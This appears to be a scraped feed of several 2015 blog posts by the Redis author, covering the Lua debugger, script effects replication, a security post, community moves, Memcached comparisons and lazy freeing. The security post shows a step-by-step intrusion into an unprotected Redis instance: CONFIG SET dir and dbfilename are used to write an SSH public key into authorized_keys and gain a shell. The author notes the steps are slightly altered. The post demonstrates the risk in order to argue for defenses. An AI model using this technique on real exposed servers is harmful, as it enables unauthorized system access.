Now to show how a debugger work, by writing a blog post about it, is surely possible but, even a purist like me writing articles in courier, will resort to a video from time to time. So here is longish video showing the main features of the Redis debugger. I start talking like a bit depressed since this was early in the morning, but after a few minutes coffee fires in and you’ll se me more happy.

(Hint: watch the video in full screen to have acceptable font size for the interactive session. Video is high quality enough to make them readable)

!~!

If you are not into playing videos, a short recap of what you can do with the Lua debugger is provided by the debugger help screen itself:

$ ./redis-cli --ldb --eval /tmp/script.lua
Lua debugging session started, please use:
quit -- End the session.
restart -- Restart the script in debug mode again.
help -- Show Lua script debugging commands.

* Stopped at 1, stop reason = step over
-> 1 local src = KEYS[1]
lua debugger> help
Redis Lua debugger help:
[h]elp Show this help.
[s]tep Run current line and stop again.
[n]ext Alias for step.
[c]continue Run till next breakpoint.
[l]list List source code around current line.
[l]list [line] List source code around [line].
line = 0 means: current position.
[l]list [line] [ctx] In this form [ctx] specifies how many lines
to show before/after [line].
[w]hole List all source code. Alias for 'list 1 1000000'.
[p]rint Show all the local variables.
[p]rint Show the value of the specified variable.
Can also show global vars KEYS and ARGV.
[b]reak Show all breakpoints.
[b]reak Add a breakpoint to the specified line.
[b]reak - Remove breakpoint from the specified line.
[b]reak 0 Remove all breakpoints.
[t]race Show a backtrace.
[e]eval Execute some Lua code (in a different callframe).
[r]edis Execute a Redis command.
[m]axlen [len] Trim logged Redis replies and Lua var dumps to len.
Specifying zero as means unlimited.
[a]abort Stop the execution of the script. In sync
mode dataset changes will be retained.

Debugger functions you can call from Lua scripts:
redis.debug() Produce logs in the debugger console.
redis.breakpoint() Stop execution like if there was a breakpoing.
in the next line of code.
lua debugger>

How it works?
---

The whole debugger is pretty much a self contained block of code, and consists of 1300 lines of code, mostly inside scripting.c, but a few inside redis-cli.c, in order to implement the CLI special mode acting as a client for the debugger. As already said this is a server-client remote debugger.

The Lua C API has a debugging interface that’s pretty useful. Is not a debugger per-se, but offers the primitives you need in order to write a debugger. However writing a debugger in the context of Redis was a bit less trivial that writing a Lua stand-alone debugger. In order to debug the script you have callbacks executed while the script is running. But when Redis is running a script, we are in the context of EVAL, executing a client command. How to do I/O there if we are blocked? Also what happens to the Redis server? Even if debugging must be performed in a development server and not into a production server, to completely hang the instance may not be a good idea. Maybe other developers want to use the instance, or the single developer that is debugging the script wants to create a new parallel debugging session. And finally, what about rolling back the changes so that the same script can be tested again and again with the same Redis data set, regardless of the changes it does while we are debugging? Determinism is gold in the context of debugging.

So I needed a complex implementation, apparently. Or I needed to cheat big time, and find a strange solution to the problem involving a lot less code and complexity, but giving 90% of the benefits I was looking for. This odd solution turned out to be the following:

* When a debugging session starts, fork() Redis.
* Capture the client file descriptor, and do direct, blocking I/O while the debugging session is active.
* Use the Redis protocol, but a trivial subset that can be implemented in a couple of lines of code, so that we don’t re-enter the Redis event loop at all. The I/O is part of the debugger.

After 400 lines of code I had all the basic working, so the rest was just a matter of adding features and fixing bugs and corner cases.

This gives us everything we needed: the server is not blocked since each debugging session is a separated process. We don’t need to re-enter the event loop from within the middle of an EVAL call, and we have rollback for free.

However, there is also a synchronous mode available, that blocks the server, in the case you really need to debug something while preserving the changes to the dataset. I’ve the feeling this will not be used much at all but to add this mode was a matter of not forking and handling the cleanup of the client at the end, so I added this mode as well.

On top of that it was possible to add everything else using a Lua “line” hook in order to implement stepping and breakpoints. Since the debugger is integrated inside Redis itself, it was trivial to capture all the Redis calls to show the user what was happening. The I/O model is also trivial, we just read input from the user and output appending to a buffer. Every time the debugger stops at some point, the output is flushed to the client as an array of “status replies”. The prefix of each line hints redis-cli about the colorization to provide.

Because of this design, the debugger was working after 2 days and was complete after 4 days of work. Moreover this design allowed me to write completely self contained code, so the debugger interacts almost zero with the rest of Redis. This will make possible to release it with Redis 3.2 in December.

A simple way to make the debugger much more powerful almost for free was to
add two new Redis Lua calls: redis.breakpoint() and redis.debug(), that
respectively can simulate a breakpoint inside the debugger (to the next line
to be executed), or log Lua objects in the debugger console. This way you can
add breakpoints that only fire when something interesting happens:

if some_odd_condition then redis.breakpoint() end

This effectively replaces a lot of complex features you may add into a debugger.
However we also have all the normal features directly inside the debugger,
like static breakpoints, the ability to observe the state, and so forth.

I’m very interested in what users writing complex scripts will think about it!
We’ll see.

Script effects replication
---

Before understanding why replicating just the *effects* of a script is interesting, it’s better to understand why instead by default replicating the script itself, to be re-executed by slaves, was considered the best option and is anyway the default. The central matter is: bandwidth between the master and the salve, and in general the ability of the slave to “follow” the master (keep in sync without too much delay) and don’t lag behind.

Think at this small Redis Lua script:

local i;
for i=0,1000000 do
redis.call(“lpush”,KEYS[1],ARGV[1])
end

It appends 1 million elements to the specified list and runs in 0.75 seconds in my testing environment. It’s just a few bytes, and runs inside the server, so replicating this script as script, and not as the 1 million commands resulting from the script execution, makes a lot of sense.

There are scripts which are exactly the opposite. At the other side of the spectrum there is a script that calculates the average of 1 million integer elements stored into a list, and stores the result setting some key with SET.

The effect of the script could be just: SET somekey 94.29

But the actual execution is maybe 2 seconds of computation. Replicating this script as the resulting command is much better. However there is a difference between replicating scripts and replicating effects: both are optimal or suboptimal depending on the use case, but replicating scripts always work, even when it’s inefficient. It never creates a situation where the replication link has to transfer huge amount of data, nor it creates a situation where the slave has to do a lot more work than the master. This is why so far Redis always used to replicate scripts verbatim.

However the most interesting part perhaps is that’s not just a matter of efficiency. When replicating scripts we need that each script is a *pure function*. Scripts executed with the same initial dataset, must produce always the same result. This requirement, prevents users from writing scripts using, for example, the TIME command, or SRANDMEMBER. Redis detects this dangerous condition and stops the script as soon as the first write command is going to be called.

Yet there are many use cases for scripts using the current time, random numbers or random elements. Replicating the effects of the script also overcomes this limitation.

So finally, and thanks to refactoring performed inside Redis in the previous months, it was possible to implement opt-in support for scripts effects replication. It is as trivial as calling, at the start of the script, the following command:

redis.replicate_commands()
… do something with the script …

The script will be replicated only as a set of write commands.
Actually there is no need to call replicate_commands() as the first command. It is enough to call it before any write, so the Lua script may even check the work to do and select the right replication model. If writes were already performed when replicate_commands() is called, it just returns false, and the normal whole script replication will be used, so the command will never prevent the script from running, even when misused.

However we did not resisted to the temptation of doing more advanced and possibly dangerous things. I designed this feature with my colleague Yossi Gottleib from Redis Labs, and he had a very compelling use case for a dangerous feature allowing the exclusion of selected commands from the replication stream.

The idea is that your script may do something like that:

1) Call certain commands that write temporary values. Think at intersections between sets just to have a mental model.
2) Perform some aggregation.
3) Store a small result as the effect of the script.
4) Discard the temporary values.

There are a few legitimate use cases for the above pattern, and guess what, you don’t want to replicate the temporary writes to your AOF and slaves. You want replicate just step “3”. So in the end we decided that, when script effects replication is enabled, it is possible for the brave user, to select what replicate and what not, by using the following API:

redis.set_repl(redis.REPL_ALL); -- The default
redis.set_repl(redis.REPL_NONE); -- No replication at all
redis.set_repl(redis.REPL_AOF); -- Just AOF replication
redis.set_repl(redis.REPL_SLAVE); -- Just slaves replication

There is a lot of room for misuse, but non expert users are very unlikely to touch this feature at all, and it can benefit who knows what to do with powerful tools.

ETA
---

Both features will be available into Redis 3.2, that will be out as an RC in mid December 2015.
Redis 3.2 is going to have many interesting new features at API level, exposed to users. A big part of the user base asked for this, after a period where we focused more into operations and internals maturity.

Feel free to ask questions in the comments if you want to know more or have any doubt.

Hacker News thread is here: https://news.ycombinator.com/item?id=10594236 Comments]]>
http://antirez.com/news/97
A few things about Redis security http://antirez.com/news/96 http://antirez.com/news/96 Tue, 03 Nov 2015 08:53:04 +0000
From time to time I get security reports about Redis. It’s good to get reports, but it’s odd that what I get is usually about things like Lua sandbox escaping, insecure temporary file creation, and similar issues, in a software which is designed (as we explain in our security page here http://redis.io/topics/security) to be totally insecure if exposed to the outside world.

Yet these bug reports are often useful since there are different levels of
security concerning any software in general and Redis specifically. What you can
do if you have access to the database, just modify the content of the database itself
or compromise the local system where Redis is running?

How important is a given security layer in a system depends on its security model.
Is a system designed to have untrusted users accessing it, like a web server
for example? There are different levels of authorization for different kinds of
users?

The Redis security model is: “it’s totally insecure to let untrusted clients access the system, please protect it from the outside world yourself”. The reason is that, basically, 99.99% of the Redis use cases are inside a sandboxed environment. Security is complex. Adding security features adds complexity. Complexity for 0.01% of use cases is not great, but it is a matter of design philosophy, so you may disagree of course.

The problem is that, whatever we state in our security page, there are a lot of Redis instances exposed to the internet unintentionally. Not because the use case requires outside clients to access Redis, but because nobody bothered to protect a given Redis instance from outside accesses via fire walling, enabling AUTH, binding it to 127.0.0.1 if only local clients are accessing it, and so forth.

Let’s crack Redis for fun and no profit at all given I’m the developer of this thing
===

In order to show the Redis “security model” in a cruel way, I did a quick 5 minutes experiment. In our security page we hint at big issues if Redis is exposed. You can read: “However, the ability to control the server configuration using the CONFIG command makes the client able to change the working directory of the program and the name of the dump file. This allows clients to write RDB Redis files at random paths, that is a security issue that may easily lead to the ability to run untrusted code as the same user as Redis is running”.

So my experiment was the following: I’ll run a Redis instance in my Macbook Air, without touching the computer configuration compared to what I’ve currently. Now from another host, my goal is to compromise my laptop.

So, to start let’s check if I can access the instance, which is a prerequisite:

$ telnet 192.168.1.11 6379
Trying 192.168.1.11...
Connected to 192.168.1.11.
Escape character is '^]'.
echo "Hey no AUTH required!"
$21
Hey no AUTH required!
quit
+OK
Connection closed by foreign host.

Works, and no AUTH required. Redis is unprotected without a password set up, and so forth. The simplest thing you can do in such a case, is to write random files. Guess what? my Macbook Air happens to run an SSH server. What about trying to write something into ~/ssh/authorized_keys in order to gain access?

Let’s start generating a new SSH key:

$ ssh-keygen -t rsa -C "crack@redis.io"
Generating public/private rsa key pair.
Enter file in which to save the key (/home/antirez/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
f0:a1:52:e9:0d:5f:e4:d9:35:33:73:43:b4:c8:b9:27 crack@redis.io
The key's randomart image is:
+--[ RSA 2048]----+
| . O+.|
| . o o..o*o|
| = . + .+ . |
| o B o . |
| . o S E . |
| . o |
| |
| |
| |
+-----------------+

Now I’ve a key. My goal is to put it into the Redis server memory, and later to transfer it into a file, in a way that the resulting authorized_keys file is still a valid one. Using the RDB format to do this has the problem that the output will be binary and may in theory also compress strings. But well, maybe this is not a problem. To start let’s pad the public SSH key I generated with newlines before and after the content:

$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt

Now foo.txt is just our public key but with newlines. We can write this string inside the memory of Redis using redis-cli:

~~~~~~~~~~~~~~~~~~~
NOTE: The following steps were altered in trivial ways to avoid that script kiddies cut & paste the attack, because from the moment this attack was published several Redis instances were compromised around the globe.
~~~~~~~~~~~~~~~~~~~

$ redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dbfilename "backup.rdb"
OK
192.168.1.11:6379> save
OK
(Ctrl+C)

$ redis-cli -h 192.168.1.11 echo flushall
$ cat foo.txt | redis-cli -h 192.168.1.11 -x set crackit

Looks good. How to dump our memory content into the authorized_keys file? That’s
kinda trivial.

$ redis-cli -h 192.168.1.11
192.168.1.11:6379> config set dir /Users/antirez/.ssh/
OK
192.168.1.11:6379> config get dir
1) "dir"
2) "/Users/antirez/.ssh"
192.168.1.11:6379> config set dbfilename "authorized.keys"
OK
192.168.1.11:6379> save
OK

At this point the target authorized keys file should be full of garbage, but should also include our public key. The string does not have simple patterns so it’s unlikely that it was compressed inside the RDB file. Will ssh be so naive to parse a totally corrupted file without issues, and accept the only sane entry inside?

$ ssh -i id_rsa antirez@192.168.1.11
Enter passphrase for key 'id_rsa':
Last login: Mon Nov 2 15:58:43 2015 from 192.168.1.10
~ ➤ hostname
Salvatores-MacBook-Air.local

Yes. I successfully gained access as the Redis user, with a proper shell, in like five seconds. Courtesy of a Redis instance unprotected being, basically, an on-demand-write-this-file server, and in this case, by ssh not being conservative enough to deny access to a file which is all composed of corrupted keys but for one single entry. However ssh is not the problem here, once you can write files, even with binary garbage inside, it’s a matter of time and you’ll gain access to the system in one way or the other.

How to fix this crap?
===

We say Redis is insecure if exposed, and the security model of Redis is to be accessed only by authorized and trusted clients. But this is unfortunately not enough. Users will still run it unprotected, and even worse, there is a tension
between making Redis more secure *against* deployment errors, and making Redis
easy to use for people just using it for development or inside secure environments
where limits are not needed.

Let’s make an example. Newer versions of Redis ship with the example redis.conf
defaulting to “bind 127.0.0.1”. If you run the server without arguments, it will
still bind all interfaces, since I don’t want to annoy users which are likely
running Redis for development. To have to reconfigure an example server just to
allow connections from other hosts is kinda a big price to pay, to win just
a little bit of security for people that don’t care. However the example redis.conf
that many users use as a template for their configuration, defaults to binding the
localhost interface. Hopefully less deployments errors will be made.

However this measures are not very effective, because unfortunately what most
security unaware users will do after realizing that binding 127.0.0.1 is preventing
them from connecting clients from the outside, is to just drop the bind line and
restart. And we are back to the insecure configuration.

Basically the problem is finding a compromise between the following three things:

1. Making Redis accessible without annoyances for people that know what they do.

2. Making Redis less insecure for people that don’t know what they do.

3. My bias towards “1” instead of “2” because RTFM.

Users ACLs to mitigate the problem
===

One way to add redundancy to the “isolation” concept of Redis from the outside world
is to use the AUTH command. It’s very simple, you configure Redis in order to
require a password, and clients authenticate via the AUTH command by using the
configured password. The mechanism is trivial: passwords are not hashed, and are
stated in cleartext inside the configuration file and inside the application, so
it’s like a shared secret.

While this is not resistant against people sniffing your TCP connections
or compromising your application servers, it’s an effective layer of security
against the obvious mistake of leaving unprotected Redis instances on the internet.

A few notes about AUTH:

1. You can use Redis as an oracle in order to test many passwords per second, but the password does not need to be stored inside a human memory, just inside the Redis config file and client configurations, so pick a very large one, and make it impossible to brute force.

2. AUTH is sent when the connection is created, and most sane applications have persistent connections, so it is a very small cost to pay. It’s also an extremely fast command to execute, like GET or SET, disk is not touched nor other external system.

3. It’s a good layer of protection even for well sandboxed environments. For an error an instance may end exposed, if not to the internet, at least to clients that should not be able to talk with it.

Maybe evolving AUTH is the right path in order to gain more security, so
some time ago I published a proposal to add “real users” in Redis: https://github.com/redis/redis-rcp/blob/master/RCP1.md

This proposal basically adds users with ACLs. It’s very similar to AUTH in the way it works and in the speed of execution, but different users have different capabilities. For example normal users are not able to access administrative commands by default, so no “CONFIG SET dir” for them, and no issues like the exploit above.

The default user can yet run the normal commands (so the patches people sent me about Lua sandboxing, that I applied, are very useful indeed), and an admin user must be configured in order to use administration commands. However what we could do to make Redis more user friendly is to always have an “admin” user with empty password which is accepted if the connection comes from the loopback interface (but it should be possible to disable this feature).

ACLs, while not perfect, have certain advantages. When Redis is exposed to the internet in the proper way, proxied via SSL, to have an additional layer of access control is very useful. Even when no SSL is used since we have just local clients, to protect with more fine grained control what clients can do has several advantages. For instance it can protect against programming or administration errors: FLUSHALL and FLUSHDB could be not allowed to normal users, the client for a Redis monitoring service would use an user only allowing a few selected commands, and so forth.

Users that don’t care about protecting their instances will stil have a database which is accessible from the outside, but without admin commands available, which still makes things insecure from the point of view of the data contained inside the database, but more secure from the point of view of the system running the Redis instance.

Basically it is impossible to reach the goal of making Redis user friendly by default and resistant against big security mistakes of users spinning an instance bound to a public IP address. However fixing bugs in the API that may allow to execute untrusted code with the same privileges of the Redis process, shipping a more conservative default configuration, and implementing multiple users with ACLs, could improve the current state of Redis security without impacting much the experience of normal Redis users that know what they are doing.

Moreover ACLs have the advantage of allowing application developers to create
users that match the actual limits of specific clients in the context of the
application logic, making mistakes less likely to create big issues.

A drawback of even this simple layer of security is that it adds complexity,
especially in the context of replication, Redis Sentinel, and other systems that
must all be authentication aware in order to work well in this new context. However it’s probably an effort that must be incrementally done.

Hacker News: https://news.ycombinator.com/item?id=10537852

Reddit: https://www.reddit.com/r/redis/comments/3rby8c/a_few_things_about_redis_security/ Comments]]>
http://antirez.com/news/96
Moving the Redis community on Reddit http://antirez.com/news/95 http://antirez.com/news/95 Thu, 22 Oct 2015 08:14:38 +0000
This looks like a crazy ideas probably in some way, and “to move” is probably not the right verb, since the ML will still exist. However it will only be used in order to receive announcements of new releases, critical informations like security related ones, and from time to time, links to very important discussions that are happening on Reddit.

Why to move? We have a huge mailing list that served us for years at this point, and there is a decent amount of traffic going on.
People go there to get some help, to provide new ideas, and so forth. However while we have some traffic the Redis mailing list is IMHO far from the “vital” thing it should be, considering the number of users using Redis currently. For most parts we see the same questions again and again, and is hard to understand if a reply is really worthwhile or not. Moreover an important topic sometimes slides away because new topics arrive, sometimes without getting much attention at all. It’s like if the ML is just a far echo of the Redis popularity, not the center of its community.

Twitter, while being a tool completely unsuitable for becoming the center of a community that needs to discuss things at length, is completely different, and gives me a feedback about how the Redis ML is in some way broken. It’s a lot more vital and it is possible to get quality feedbacks, but everything is limited to 140 characters in flat threads where eventually it is kinda impossible to continue any sane discussion. However Twitter and other signals I get, are the proof that people *moved away* from emails. I bet an huge amount of users subscribed to the ML just archive it into a label to read it never or seldom.

So why Reddit instead? Because it’s the center of the most vital communities on the internet today. Because it’s centered on a voting system, so if an user asks for help, even if you don’t want to contribute, you can use the comment voting to tell the difference between a lame request and a great one, a poor reply and an outstanding one. Reddit also allows to vote the topics so that things which are important for the community will get more contributions. Has a side bar that can be used for FAQs and other important pointers, and has a ton of existing subscribers.

Reddit also contains “gamification” elements that may be useful and funny. For example you can associate small sentences or images to your username in a given sub-reddit, in order to state, for example, if you use Redis for caching, as a store, for messaging or whatever. Your reply in a given context can be read more clearly if it is possible to understand what kind of Redis user you are.

It is possible to write guidelines in the submission page, so that people realize what to provide before posting. For example we’ll have warnings telling you to post the INFO output of your master and slaves if you want us to investigate your replication issues.

So, what happens now? I asked Reddit admins to get access to /r/redis, which is a sub created years ago but not actively administered apparently. When I receive the admin privileges I’ll setup the sub in order to only accent comment submissions (not direct links, you’ll be still able to post a link if you comment it). At this point the Redis ML will be modified in order to moderate each single message, we’ll advice people posting help questions to go on Reddit. The Redis.io community page will be updated to instruct new users about Reddit being our primary discussion forum.

Why not using Discourse or Stack Overflow, you’ll ask? SO is great but is not suitable for general conversation, and we need this a lot. People will continue to post Redis questions on SO and we’ll continue to reply, of course. Discourse is more an evolution of the mailing list we are using, but is not technically speaking a “social site”, we want to go where communities are already and where voting things is the main idea, so that as the Redis community grow we find a way to filter the most interesting contribs and highlight them.

Maybe the experiment will fail and we’ll return back to the mailing list, or we’ll try Discourse, but I think a too important change in the way programmers communicate is happening in order to ignore it. I must try. I think email lost in some way, it is no longer something scalable. For me it lost several years ago, I rarely reply to emails at all, since they are a tool that does not take into account people inability to scale reading too many messages. I hope we’ll have a great time on Reddit. See you there!

P.s. if you are a Reddit admin reading this, please evaluate my request to take ownership of /r/redis here: https://www.reddit.com/r/redditrequest/comments/3pnwrx/requesting_rredis/ Comments]]>
http://antirez.com/news/95
Clarifications about Redis and Memcached http://antirez.com/news/94 http://antirez.com/news/94 Sat, 26 Sep 2015 16:16:14 +0000 However it is also true that in order to pick the right solution users must be correctly informed.

This post was triggered by reading a blog post published by Mike Perham, that you may know as the author of a popular library called Sidekiq, that happens to use Redis as backend. So I would not consider Mike a person which is “against” Redis at all. Yet in his blog post that you can find at the URL http://www.mikeperham.com/2015/09/24/storing-data-with-redis/ he states that, for caching, “you should probably use Memcached instead [of Redis]”. So Mike simply really believes Redis is not good for caching, and he arguments his thesis in this way:

1) Memcached is designed for caching.
2) It performs no disk I/O at all.
3) It is multi threaded and can handle 100,000s of requests by scaling multi core.

I’ll address the above statements, and later will provide further informations which are not captured by the above sentences and which are in my opinion more relevant to most caching users and use cases.

Memcached is designed for caching: I’ll skip this since it is not an argument. I can say “Redis is designed for caching”. So in this regard they are exactly the same, let’s move to the next thing.

It performs no disk I/O at all: In Redis you can just disable disk I/O at all if you want, providing you with a purely in-memory experience. Except, if you really need it, you can persist the database only when you are going to reboot, for example with “SHUTDOWN SAVE”. The bottom line here is that Redis persistence is an added value even when you don’t use it at all.

It is multi threaded: This is true, and in my goals there is to make Redis I/O threaded (like in memcached, where the data access itself is not threaded, basically). However Redis, especially using pipelining, can serve an impressive amount of requests per second per thread (half a million is a common figure with very intensive pipelining. Without pipelining it is around 100,000 ops/sec). In the vanilla caching scenario where each Redis instance is the same, works as a master, disk ops are disabled, and sharding is up to the client like in the “memcached sharding model”, to spin multiple Redis processes per system is not terrible. Once you do this what you get is a shared-nothing multi threaded setup so what counts is the amount of operations you can serve per single thread. Last time I checked Redis was at least as fast as memcached per each thread. Implementations change over time so the edge today may be of the one or the other, but I bet they provide near performances since they both tend to maximize the resources they can use. Memcached multi threading is still an advantage since it makes things simpler to use and administer, but I think it is not a crucial part.

There is more. Mike talks of operations per second without citing the *quality* of operations. The thing is in systems like Redis and Memcached the cost of command dispatching and I/O is dominating compared to actually touching the in-memory data structures. So basically in Redis executing a simple GET, a SET, or a complex operation like a ZRANK operation is about the same cost. But what you can achieve with a complex operation is a lot more work from the point of view of the application level. Maybe instead of fetching five cached values you can just send a small Lua script. So the actual “scalability” of the two systems have many dimensions, and what you can achieve is one of those.

Of Mike’s concerns the only valid I can see is multi threading which, if we consider Redis in its special case of memcached replacement, may be addressed executing multiple processes, or simply by executing just one since it will be very very hard to saturate one thread doing memcached alike operations.

The real differences


Now it’s time to talk about the *real* differences between the two systems.

* Memory efficiency

This is where Memcached used to be better than Redis. In a system designed to represent a plain string to string dictionary, it is simpler to make better use of memory. This difference is not dramatic and it’s like 5 years I don’t check it, but it used to be noticeable.

However if we consider memory efficiency of a long running process, things are a bit different. Read the next section.

But again to really evaluate memory efficiency, you should put into the bag that specially encoded small aggregated values in Redis are very memory efficient. For example sets of small integers are represented internally as an array of 8, 16, 32 or 64 bits integers, and are accessed in logarithmic time when you want to check the existence of some since they are ordered, so binary search can be used.

The same happens when you use hashes to represent objects instead of resorting to JSON. So the real memory efficiency must be evaluated with an use case at hand.

* Redis LRU vs Slab allocator

Memcached is not perfect from the point of view of memory utilization. If you happen to have an application that dramatically change the size of the cached values over time, you are likely to incur severe fragmentation and the only cure is a reboot. Redis is a lot more deterministic from this point of view.

Moreover Redis LRU was lately improved a lot, and is now a very good approximation of real LRU. More info can be found here: http://redis.io/topics/lru-cache. If I understand correctly, memcached LRU still expires according to its slab allocator so sometimes the behavior may be far from real LRU, but I would like to hear what experts have to say about this. If you want to test Redis LRU you now can using the redis-cli LRU testing mode available in recent versions of Redis.

* Smart caching

If you want to use Redis for caching, and use it ala-memcached, you are truly missing something. This is the biggest mistake in Mike’s blog post in my opinion. People are switching to Redis more and more because they discovered that they can represent their cached data in more useful ways. What to retain the latest N items of something? Use a capped list. Want to take a cached popularity index? Use a sorted set, and so forth.

* Persistence and Replication

If you need those, they are very important assets. For example using this model scaling a huge load of reads is very simple. The same about restarts with persistence, the ability to take cache snapshots over time, and so forth. But it’s totally fair to have usages where both features are totally irrelevant. What I want to say here is that there are “pure caching” use cases where persistence and replication are important.

* Observability

Redis is very very observable. It has detailed reporting about a ton of internal metrics, you can SCAN the dataset, observe the expiration of objects. Tune the LRU algorithm. Give names to clients and see them reported in CLIENT LIST. Use “MONITOR” to debug your application, and many other advanced things. I believe this to be an advantage.

* Lua scripting

I believe Lua scripting to be an impressive help in many caching use cases. For example if you have a cached JSON blob, with a Lua command you can extract a single field and return it to the client instead of transferring everything (you can do the same, conceptually, using Redis hashes directly to represent objects).

Conclusions


Memcached is a great piece of software, I read the source code multiple times, it was a revolution in our industry, and you should check if for you is a better bet compared to Redis. However things must be evaluated for what they are, and in the end I was a bit annoyed to read Mike’s report and very similar reports over the years. So I decided to show you my point of view. If you find anything factually incorrect, ping me and I’ll update the blog post according with “EDIT” sections. Comments]]>
http://antirez.com/news/94
Lazy Redis is better Redis http://antirez.com/news/93 http://antirez.com/news/93 Sat, 26 Sep 2015 07:56:32 +0000
However some time ago I opened an issue where I promised a new Redis feature that many wanted, me included, called “lazy free”. The original issue is here: https://github.com/antirez/redis/issues/1748.

The gist of the issue is that Redis DEL operations are normally blocking, so if you send Redis “DEL mykey” and your key happens to have 50 million objects, the server will block for seconds without serving anything in the meantime. Historically this was accepted mostly as a side effect of the Redis design, but is a limit in certain use cases. DEL is not the only blocking command, but is a special one, since usually we say: Redis is very fast as long as you use O(1) and O(log_N) commands. You are free to use O(N) commands but be aware that it’s not the case we optimized for, be prepared for latency spikes.

This sounds reasonable, but at the same time, even objects created with fast operations need to be deleted. And in this case, Redis blocks.

The first attempt


In a single-threaded server the easy way to make operations non-blocking is to do things incrementally instead of stopping the world. So if there is to free a 1 million allocations, instead of blocking everything in a for() loop, we can free 1000 elements each millisecond, for example. The CPU time used is the same, or a bit more, since there is more logic, but the latency from the point of view of the user is ways better. Maybe those cycles to free 1000 elements per millisecond were not even used. Avoiding to block for seconds is the key here. This is how many things inside Redis work: LRU eviction and keys expires are two obvious examples, but there are more, like incremental rehashing of hash tables.

So this was the first thing I tried: create a new timer function, and perform the eviction there. Objects were just queued into a linked list, to be reclaimed slowly and incrementally each time the timer function was called. This requires some trick to work well. For example objects implemented with hash tables were also reclaimed incrementally using the same mechanism used inside Redis SCAN command: taking a cursor inside the dictionary and iterating it to free element after element. This way, in each timer call, we don’t have to free a whole hash table. The cursor will tell us where we left when we re-enter the timer function.

Adaptive is hard


Do you know what is the hard part with this? That this time, we are doing a very special task incrementally: we are freeing memory. So if while we free memory incrementally, the server memory raises very fast, we may end, for the sake of latency, to consume an *unbound* amount of memory. Which is very bad. Imagine this, for example:

WHILE 1
SADD myset element1 element2 … many many many elements
DEL myset
END

If deleting myset in the background is slower compared to our SADD call adding tons of elements per call, our memory usage will grow forever.

However after a few experiments, I found a way to make it working very well. The timer function used two ideas in order to be adaptive to the memory pressure:

1. Check the memory tendency: it is raising or lowering? In order to adapt how aggressively to free.
2. Also adapt the timer frequency itself based on “1”, so that we don’t waste CPU time when there is little to free, with continuous interruptions of the event loop. At the same time the timer could reach ~300 HZ when really needed.

A small portion of code, from the now no longer existing function implementing this ideas:

/* Compute the memory trend, biased towards thinking memory is raising
* for a few calls every time previous and current memory raise. */
if (prev_mem < mem) mem_trend = 1;
mem_trend *= 0.9; /* Make it slowly forget. */
int mem_is_raising = mem_trend > .1;

/* Free a few items. */
size_t workdone = lazyfreeStep(LAZYFREE_STEP_SLOW);

/* Adjust this timer call frequency according to the current state. */
if (workdone) {
if (timer_period == 1000) timer_period = 20;
if (mem_is_raising && timer_period > 3)
timer_period--; /* Raise call frequency. */
else if (!mem_is_raising && timer_period < 20)
timer_period++; /* Lower call frequency. */
} else {
timer_period = 1000; /* 1 HZ */
}

It’s a good trick and it worked very well. But still it was kinda sad we have to do this operation in a single thread. There was a lot of logic to handle that well, and anyway when the lazy free cycle was very busy, operations per second were reduced to around 65% of the norm.

Freeing objects in a different thread would be much simpler: freeing is almost always faster than adding new values in the dataset, if there is a thread which is busy doing only free operations.
For sure there is some contention between the main thread calling the allocator and the lazy free thread doing the same, but Redis spends a fraction of its time on allocations, and much more time on I/O, command dispatching, cache misses, and so forth.

However there was a big problem with implementing a threaded lazy free: Redis itself. The internal design was totally biased towards sharing objects around. After all they are reference counted right? So why don’t share as much as possible? We can save memory and time. A few examples: if you do SUNIONSTORE you end with shared objects in the target set. Similarly, client output buffers have lists of objects to send to the socket as reply, so during a call like SMEMBERS all the set members may end shared in the output buffer list. So sharing objects sounds so useful, lovely, wonderfully, greatly cool.

But, hey, there is something more here. If after an SUNIONSTORE I re-load the database, the objects will be unshared, so the memory suddenly may jump to more than it was. Not great. Moreover what happens when we send replies to clients? We actually *glue together* objects into plain buffers when they are small, since otherwise doing many write() calls is not efficient! (free hint, writev() does not help). So we are mostly copying already. And in programming when something is not useful, but exists, it is likely a problem.

And indeed each time you had to access a value, inside a key containing an aggregate data type, you had to traverse the following:

key -> value_obj -> hash table -> robj -> sds_string

So what about getting rid of “robj” structures entirely and converting aggregate values to be made just of hash tables (or skiplists) of SDS strings? (SDS is the library we use inside Redis for strings).
There is a problem with that. Immagine a command like SADD myset myvalue. We can’t take client->argv[2], for example, and just reference it in the hash table implementing the set. We have to *duplicate* values sometimes and can’t reuse the ones already existing in the client argument vector, created when the command was parsed. However Redis performance is dominated by cache misses, so maybe we can compensate this with one indirection less?

So I started to work to this new lazyfree branch, and tweeting about it on Twitter without any context so that everybody was thinking I was like desperate or crazy (a few eventually asked WTF this lazyfree thing was). So what I did?

1. Change client output buffers to use just dynamic strings instead of robj structures. Values are always copied when there is to create a reply.
2. Convert all the Redis data types to use SDS strings instead of shared robj structures. Sounds trivial? ~800 highly bug sensitive lines changed in the course of multiple weeks. But now all tests are passing.
3. Rewrite lazyfree to be threaded.

The result is that Redis is now more memory efficient since there are no robj structures around in the implementation of the data structures (but they are used in the code paths where there is a lot of sharing going on, for example during the command dispatch and replication). Threaded lazy free works great and is faster than the incremental one to reclaim memory, even if the implementation of the incremental one is something I like a lot and was not so terrible even compared with the threaded one. But now, you can delete a huge key and the performance drop is negligible which is very useful. But, the most interesting thing is, Redis is now faster in all the operations I tested so far. Less indirection was a real winner here. It is faster even in unrelated benchmarks just because the client output buffers are now simpler and faster.
In the end I deleted the incremental lazy freeing implementation from the branch, to retain only the threaded one.

A note about the API


However what about the API? We still have a blocking DEL, the default is the same, since DEL in Redis means: reclaim memory now. I didn’t like the idea of changing that. So now you have a new command called UNLINK which more clearly states what is happening to the value.

UNLINK is a smart command: it calculates the deallocation cost of an object, and if it is very small it will just do what DEL is supposed to do and free the object ASAP. Otherwise the object is sent to the background queue for processing. Otherwise the two commands are identical from the point of view of the keys space semantics.

FLUSHALL / FLUSHDB non blocking variants were also implemented, but still not at API level, they’ll just take a LAZY option that if given will change the behavior.

Not just lazy freeing


